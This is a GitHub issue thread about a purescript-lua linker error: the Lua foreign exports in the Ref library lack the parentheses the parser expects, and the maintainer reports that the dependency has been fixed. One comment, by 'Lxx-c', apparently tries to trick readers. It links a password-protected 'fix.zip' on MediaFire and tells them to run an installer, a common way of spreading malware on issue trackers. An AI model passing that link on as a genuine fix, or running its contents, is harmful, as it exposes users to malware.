### ISSUE TITLE
`purescript-ref` doesn't compile due to foreign exports mismatching format

### ISSUE THREAD

**Issue by Renegatto** [Unisay/purescript-lua#29] opened 2024-08-26 14:46 UTC
On the one side it does expect that, on the other side it does not wrap their exports in the parentheses, violating it's own expectations.

```
[info] Build succeeded.
PS Lua: compiling ...
Linker error:
Error parsing foreign file "/home/user/purescript-lua-template/.spago/refs/v6.0.1/src/Effect/Ref.lua":
/home/user/purescript-lua-template/.spago/refs/v6.0.1/src/Effect/Ref.lua:2:10:
  |
2 |   _new = function(val) return function() return {value = val} end end,
  |          ^
unexpected 'f'
expecting '(' or white space
```
Wrapping value in the parentheses would indeed work:
```
   _new = (function(val) return function() return {value = val} end end),
```

**Comment by Lxx-c** [comment] 2024-08-26 14:46
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Renegatto** [comment] 2024-08-26 22:35
It seems to be right there:
https://github.com/Unisay/purescript-lua/blob/bef2ba667f395705bf3102fa17e7e22af8f3b694/lib/Language/PureScript/Backend/Lua/Linker/Foreign.hs#L95-L96

**Comment by Renegatto** [comment] 2024-08-27 10:04
It does not really misexpect this:
https://github.com/Unisay/purescript-lua/blob/bef2ba667f395705bf3102fa17e7e22af8f3b694/lib/Language/PureScript/Backend/Lua/Linker/Foreign.hs#L46

That probably means that the dependency (in this case Ref library) foreign code should be fixed.

**Comment by Unisay** [comment] 2024-09-09 07:55
The foreign code in the `purescript-lua-ref` has been fixed, please update your package set and close this issue if the problem is gone, thanks!

**Closed** 2024-09-09 09:16 UTC
Labels: bug
